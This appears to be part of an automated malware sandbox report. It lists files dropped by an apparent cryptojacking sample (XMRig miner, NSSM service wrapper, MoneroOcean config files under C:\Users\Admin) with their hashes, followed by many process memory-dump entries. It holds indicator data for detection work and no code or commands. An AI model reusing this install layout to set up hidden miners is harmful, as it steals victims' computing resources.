ad72e804d21b3acad05476e02c43d80b4d627d7ac5d6a7ae315a58e7cd34cb0b0560182526839e622bcf13c48c1549e1e331a3b7799fdd1438cb471e556ee62a

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
ebdac8cef71980526bd6f06350ee1c1d

SHA1
67763d492956d1ebc9c4a9d2c4910fd43092a4c0

SHA256
3fc3a5a51b645d6427251d3382fc5315479bff0bc9584c9fba9562fab3367d51

SHA512
fc05f3b7e0a9724d3728e4ef26307d723d66ab7527891b6a1eb4536ece106be3ba48ae8ed3e4e26e06352e2ac40fe35f2b95ab22b4208ffa82917d9630e63a44

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
df0a075672989faa6bd717bf4209d5ce

SHA1
43c60602590bac63b94ddc2e5f1cd13d66a494c9

SHA256
5388bc83243120d495752324e12fbc57535e6d541aefa8bc059d75f90c610764

SHA512
d5f9baaeaecd997c661f757e7ef6bc84bd0f70d77c6da513ad5f82aec05bc105a7871a2cadb3ee4c1b30791c587222450f10f792c5492070e6e8681bb3a7eca9

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
fc01a77723f4a16d9b9468099bac7cfd

SHA1
53ed68fe069da0a1550cb0d6dc58d98520d8af7c

SHA256
6b3fe1c14e59f63292034069fe3fe7e77bfcb475cc4eca35f0ec7e4e11ad836a

SHA512
0a0eb6b54dcf906dc1fcdffd33d1fd047a608d8ca9dbca6855ae019de937005da6d772d0dc8c59a48573ae67bb151da5f9c997f2770f0ef1ca6246a8ae452a2c

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
d4f8a13f8c90e2b3b2e7d30a553df39c

SHA1
5c5303ef682ffcd31e57d1abd900ba5b637d51e4

SHA256
f7fc5b53e709adc1f4116ff47656f7262d7fb2859a100b3e3a5568453485649a

SHA512
68b0b59a732fecc8b345fa0429039d36bc3031ab65198e4d3783a5c16fa768bb6562131c1db58d00ad9c4af7fd8d77aed3c2150930663280a6bbd635ba5831bd

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
c9ef9c214996db3d88f571226910c5d5

SHA1
420ba30247b1e09f706557a7704a1ebee5d3165c

SHA256
fa55a24dccbf28309642d958cbb73f5053e3a56baa0eda22d4581e0151f5f7c1

SHA512
de91ef4268e67c4fa8d7216637bd9ca69ea33b108352675c954d4719d2d58b9414df78c6ebc8f622fcfbeda4ad5f981c2a17a48f7eeae8626cefe5b6894ec68d

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
725d38d9eeadc9c2691063936b01f9ec

SHA1
153fd5bd55cfd845516562291a7ab867d68145b5

SHA256
0df3cdd812a582b5ddf5c8019fe7aecf03edb5760f4cf2d0c81ba73590a2ec43

SHA512
fe2758ddaa974696c733367d479dc54695ee1f177275f3b26d575b3c27b8c968b6bab0ce1e5b715e6513d1f39d880462b3d8cc542507f2eeae531a9a6d337658

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
64cafb884608c751a2bccaca7c582e0f

SHA1
924f71ecb4903ab63a13a125e62fd6e5f5d20cb2

SHA256
3250e852f2fb3e61bd0642d92f1decac666777da7c4d59d6270ee49fc856151b

SHA512
ddd68d3d13bd65f926f6be67ac891c143d6e282ee955871382452f2627ca42ed54e7363d83651b904cdf8054bc1d12a02becd44ac1b5cdc98ac42fc7ebfe97a0

Download Submit
C:\Users\Admin\moneroocean\nssm.exe

Filesize
360KB

MD5
1136efb1a46d1f2d508162387f30dc4d

SHA1
f280858dcfefabc1a9a006a57f6b266a5d1fde8e

SHA256
eee9c44c29c2be011f1f1e43bb8c3fca888cb81053022ec5a0060035de16d848

SHA512
43b31f600196eaf05e1a40d7a6e14d4c48fc6e55aca32c641086f31d6272d4afb294a1d214e071d5a8cce683a4a88b66a6914d969b40cec55ad88fde4077d3f5

Download Submit
C:\Users\Admin\moneroocean\xmrig.exe

Filesize
9.0MB

MD5
9ee2c39700819e5daab85785cac24ae1

SHA1
9b5156697983b2bdbc4fff0607fadbfda30c9b3b

SHA256
e7c13a06672837a2ae40c21b4a1c8080d019d958c4a3d44507283189f91842e3

SHA512
47d81ff829970c903f15a791b2c31cb0c6f9ed45fdb1f329c786ee21b0d1d6cd2099edb9f930824caceffcc936e222503a0e2c7c6253718a65a5239c6c88b649

Download Submit
C:\Users\Admin\nssm.zip

Filesize
135KB

MD5
7ad31e7d91cc3e805dbc8f0615f713c1

SHA1
9f3801749a0a68ca733f5250a994dea23271d5c3

SHA256
5b12c3838e47f7bc6e5388408a1701eb12c4bbfcd9c19efd418781304590d201

SHA512
d7d947bfa40d6426d8bc4fb30db7b0b4209284af06d6db942e808cc959997cf23523ffef6c44b640f3d8dbe8386ebdc041d0ecb5b74e65af2c2d423df5396260

Download Submit
C:\Users\Admin\xmrig.zip

Filesize
3.5MB

MD5
640be21102a295874403dc35b85d09eb

SHA1
e8f02b3b8c0afcdd435a7595ad21889e8a1ab0e4

SHA256
ed33e294d53a50a1778ddb7dca83032e9462127fce6344de2e5d6be1cd01e64b

SHA512
ece0dfe12624d5892b94d0da437848d71b16f7c57c427f0b6c6baf757b9744f9e3959f1f80889ffefcb67a755d8bd7a7a63328a29ac9c657ba04bbdca3fea83e

Download Submit
memory/1788-2-0x00000298440F0000-0x0000029844112000-memory.dmp

Filesize
136KB

Download
memory/2216-187-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2216-202-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2216-234-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2216-233-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2216-173-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2216-174-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2216-175-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2216-176-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2216-177-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2216-178-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2216-179-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2216-180-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2216-181-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2216-182-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2216-183-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2216-184-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2216-185-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2216-186-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2216-232-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2216-188-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2216-189-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2216-190-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2216-191-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2216-192-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2216-193-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2216-194-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2216-195-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2216-196-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2216-197-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2216-198-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2216-199-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2216-200-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2216-201-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2216-231-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2216-203-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2216-205-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2216-206-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2216-207-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2216-208-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2216-209-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2216-210-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2216-211-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2216-212-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2216-213-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2216-214-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2216-215-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2216-216-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2216-217-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2216-218-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2216-219-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2216-220-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2216-221-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2216-222-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2216-223-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2216-224-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2216-225-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2216-226-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2216-227-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2216-228-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2216-229-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2216-230-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3040-24-0x0000028033420000-0x000002803342A000-memory.dmp

Filesize
40KB

Download
memory/3040-25-0x0000028033450000-0x0000028033462000-memory.dmp

Filesize
72KB

Download
memory/3388-50-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3388-49-0x0000000001290000-0x00000000012B0000-memory.dmp

Filesize
128KB

Download